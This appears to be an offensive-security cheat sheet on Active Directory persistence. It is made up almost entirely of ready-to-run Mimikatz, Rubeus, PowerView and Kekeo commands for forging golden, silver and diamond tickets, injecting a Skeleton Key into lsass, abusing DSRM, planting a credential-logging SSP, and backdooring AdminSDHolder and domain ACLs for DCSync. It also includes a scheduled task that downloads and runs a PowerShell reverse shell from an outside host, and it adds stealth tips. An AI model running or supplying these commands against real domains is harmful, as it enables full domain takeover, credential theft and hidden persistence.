Install Chrome Extension For Persistence
AD DS Persistence
Insomnihack 2024
Or in French - LeHack 2023:
Golden Tickets
krbtgt hash could be used to impersonate any user
It is recommended to change the password of krbtgt account twice as password history is maintained for the account
Mimikatz on DC to get krbt hash
Copy Invoke-Mimikatz - Command '"lsadump::lsa /patch"' - ComputerName dcorp - dc
Copy Invoke-Mimikatz - Command '"lsadump::dcsync /user:domain\krbtgt"' DCSync (no code execution on the target DC) to get krbtgt hash
Copy SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
krbtgt hash could also be dump from NTDS.dit
Create golden ticket
Using AES keys makes the attack more silent
From any machine connected with DC
Mimikatz
Copy Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt"' BetterSafetyKatz
Copy BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" Rubeus
Copy Rubeus.exe golden / aes256: < krbtgt_aes256_key > / sid: < domain_sid > / ldap / user:Administrator / printcmd Silver Tickets
Whereas golden tickets are forged TGTs, silver tickets are forged service tickets (TGS) - Encrypted and signed by the hash of the service account (golden ticket is signed by the hash of krbtgt)
Ex 1 : Access to file system on the DC
Using AES key is more silent
Copy BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Copy Invoke-Mimikatz -Command "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" Can be use for other services: HOST, RPCSS, HTTP, etc.
List of SPN: https://adsecurity.org/?page_id=183
Ex: HTTP With Rubeus
Copy Rubeus.exe silver /service:http/dc.domain.local /rc4:<rc4_key_service_account> /sid:<domain_sid> /ldap /user:Administrator /domain:domain.local /ptt Ex 2 : Achieve command execution using silver ticket
HOST SPN allow us to schedule a task on the target
Copy BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Copy Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"' Schedule and execute a task
Copy schtasks /create /S dc.domain.local /SC weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c \"iex (New-Object Net-WebClient).DownloadString('http://IP/Invoke-PowershellTcp.ps1')\""
schtasks / Run / S dc.domain.local / TN "STCheck" Diamond Tickets
Decrypt a valid TGT, make changes to it and re-encrypt it using krbtgt account
More opsec safe than a golden ticket
Copy Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /user:target_username /password:target_password /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /ptt /tgtdeleg option in place of credentials in case we have access to a domain user
Copy Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /tgtdeleg /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /ptt Skeleton Key
Patch a DC (lsass process) so that it allows access as any user with a single password
Skeleton Key is not opsec safe ad is known to caus issues with AD CS
Inject a skeleton key (password is mimikatz) on a DC.
Copy Invoke-Mimikatz - Command '"privilege::debug" "misc::skeleton"' - ComputerName dc.domain.local Now, we can access any machine with a valid username and password as "mimikatz"
Copy Enter-PSSession - Computername dc - Credential domain\Administrator In case lsass is running as a protected process, we need mimidriv.sys on disk of the target DC
Very noisy in logs - Service installation (Kernel mode driver)
Copy mimikatz# privilege::debug
mimikatz# !+
mimikatz# !processprotect /process:lsass.exe /remove
mimikatz# misc::skeleton
mimikatz# !- Modify the default key
https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_misc.c#L611
For example, to use "S3c3rtP@ss", compute its RC4 and split it into 8 bytes stubs:
Copy 56aa742a
6bebb9ca
62fc9f70
a2e00cd3 Reverse the values by 2 bytes
Copy 2a74aa56
cab9eb6b
709ffc62
d30ce0a2 Prepend 0x to each and modify kiwikey array value in the code linked above
Copy DWORD kiwiKey[] = {0x2a74aa56, 0xcab9eb6b, 0x709ffc62, 0xd30ce0a2} DSRM - Directory Services Restore Mode
There is a local admin "Administrator" on every DC whose password is DSRM. DSRM password is required when a server is promoted to DC and it is rarely changed
Dump DSRM password - DA privileges needed
Copy Invoke-Mimikatz - Command '"token::elevate" "lsadump::sam"' - Computername dc Compare the Administrator hash with the Administrator hash of below command
Copy Invoke-Mimikatz - Command '"lsadump::lsa /patch"' - Computername dc Logon Behavior for the DSM account needs to be changed before passing the hash
Copy Enter-PSSession - Computername dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD or
Copy Invoke-Command - ComputerName dc - ScriptBlock {
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
} Pass the hash
Copy Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc.domain.local /user:Administrator /ntlm:<dsrm_hash> /run:powershell.exe"'
ls \\dc\C$ To use PSRemoting, we must force NTLM authentication:
Copy Enter-PSSession - ComputerName dc - Authentication Negotiate Custom SSP
Security Support Provider is a DLL which provides ways for an application to obtain an authenticated session. Ex: NTLM, Kerberos, Wdigest, CredSSP
Mimikatz mimilib.dll is a custom SSP that logs local logons, service account and machine account passwords in clear text on the target server
All local logons on the DC are logged to C:\Windows\system32\mimilsa.log or C:\Windows\system32\kiwissp.log
Way 1
Drop mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
Copy $packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ - Name 'Security Packages' - Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ - Name 'Security Packages' - Value $packages Way 2
Inject into lsass
Not stable with Server 2019 and Server 2022
Copy Invoke-Mimikatz - Command '"misc::memssp"' AdminSDHolder
Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL
Well Known abuse of Protected Groups
https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-11_Active_directory_v2.5.pdf
Protected Group Abuse Can modify DA/EA/BA groups. Can modify nested groups within these groups
Backup GPO, edit to add SID of controlled account to a privileged group and Restore
Run a command as system (using the disabled Browser service)
Copy ntd.dit backup, load device drivers
Group Privileges Add FullPermissions to a user
With DA privs, AdminSDHolder can be used as a backdoor/persistence mechanisme by adding a user with Full Permissions to the AdminSDHolder object
With PowerView
Copy Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose With AD Module and RACE toolkit
Copy Set-DCPermissions -Method AdminSDHolder -SAMAccountName username -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -Verbose Other permissions: ResetPassword, WriteMembers
Copy Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights ResetPassword -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
Copy Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights WriteMembers -PrincipalDomain domain.local -TargetDomain domain.local -Verbose Run SDProp manually
Copy Invoke-SDPropagator - timeoutMinutes 1 - showProgress - Verbose For pre-Server 2008:
Copy Invoke-SDPropagator - taskname FixUpInheritance - timeoutMinutes 1 - showProgress - Verbose Check Domain Admins permission
PowerView
Copy get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -matche "username} AD Module
Copy (Get-Acl -Path 'AD:\C:\CN=Domain Admins,CN=Users,DC=domain,DC=local').Access | ?{$_.IdentityReference -match 'username'} Exploit
FullControl
PowerView
Copy Add-DomainGroupMember - Identity 'Domain Admins' - Members testda - Verbose AD Module
Copy Add-ADGroupMember - Identity 'Domain Admins' - Members testda ResetPassword
PowerView
Copy Set-DomainUserPassword -Idenity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose AD Module
Copy Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose Rights Abuse
With DA privs, the ACL for the domain root can be modified to provide rights like FullControl or the ability to run DCSync
FullControl
Add FullControl rights:
With PowerView
Copy Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose With AD Module and RACE toolkit
https://github.com/samratashok/RACE
Copy Set-ADCL - SAMAccountName username - Right GenericAll - DistinguishedName 'DC=domain,DC=local' - Verbose DCSync
Add rights for DCSync:
With PowerView
Copy Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights DCSync -PrincipalDomain domain.local -TargetDomain domain.local -Verbose With AD Module and RACE toolkit
https://github.com/samratashok/RACE
Copy Set-ADCL - SAMAccountName username - GUIDRight DCSync - DistinguishedName 'DC=domain,DC=local' - Verbose Execute DCSync
DCSync
Copy Invoke-Mimikatz - Command '"lsadump::dcsync /user:domain\krbtgt"'
Copy SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit" Security Descriptors
Modify Security Descriptors of multiple remote access methods to allow access to non-admin users. Admin privs are required
With RACE toolkit: https://github.com/samratashok/RACE
WMI
On local machine for user1
Copy Set-RemoteWMI - SamAccoutName user1 - Verbose On remote machine for user1 without explicit credentials
Copy Set-RemoteWMI - SamAccoutName user1 - ComputerName dc - namespace 'root\cimv2' - Verbose On remote machine with explicit credentials
Copy Set-RemoteWMI - SamAccoutName user1 - ComputerName dc - Credential Administrator - namespace 'root\cimv2' - Verbose On remote machine remove permissions
Copy Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -namespace 'root\cimv2' -Remove -Verbose PS Remoting backdoor
Not stable after August 2020 patches
On local machine for user1
Copy Set-RemotePSRemoting -SamAccoutName user1 -Verbose On remote machine for user1 without explicit credentials
Copy Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -Verbose On remote machine, remove permissions
Copy Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -Remove Remote Registry
With DAMP
Copy Add-RemoteRegBackdoor -ComputerName dc -Trustee user1 -Verbose As user1, retrieve machine account hash
Copy Get-RemoteMachineAccountHash -ComputerName dc -Verbose Retrieve local account hash
Copy Get-RemoteLocalAccountHash -ComputerName dc -Verbose Retrieve domain cached credentials
Copy Get-RemoteCachedCredential -ComputerName dc -Verbose msDS-AllowedToDelegateTo
SeEnableDelegationPrivilege on the DC and full rights on the target user - default for Domain Admins and Enterprise Admins
With Powershell
Copy # PowerView
Set-DomainObject-Identity devuser -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject-Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/dc.domain.local"}
Set-DomainObject-SamAccountName devuser -Xor @{"useraccountcontrol"="16777216"}
Get-DomainUser –TrustedToAuth
# AD Module
Set-ADUser -Identity devuser -ServicePrincipalNames @{Add='dev/svc'}
Set-ADUser -Identity devuser Add @{@{'msDS AllowedToDelegateTo' = @('ldap/dc', 'ldap/dc.domain.local)} -Verbose
Set-ADAccountControl-Identity devuser -TrustedToAuthForDelegation $true
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
With Kekeo
Copy kekeo# tgt::ask /user:devuser /domain:domain.local /password:Sup3rPassword!
kekeo# tgs::s4u /tgt:TGT_devuser@domain.local_krbtgt~domain.local@domain.local.kirbi /user:Administrator@domain.local /service:ldap/dc.domain.local
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@domain.local_ldap~dc.domain.local@domain.local.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"' With Rubeus
Copy # Get RC4 hash
Rubeus.exe hash /password:Sup3rPassword! /user:devuser /domain:domain.local
Rubeus.exe s4u /user:devuser /rc4:<rc4_hash> /impersonateuser:administrator /msdsspn:ldap/dc.domain.local /domain:domain.local /ptt
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit" 
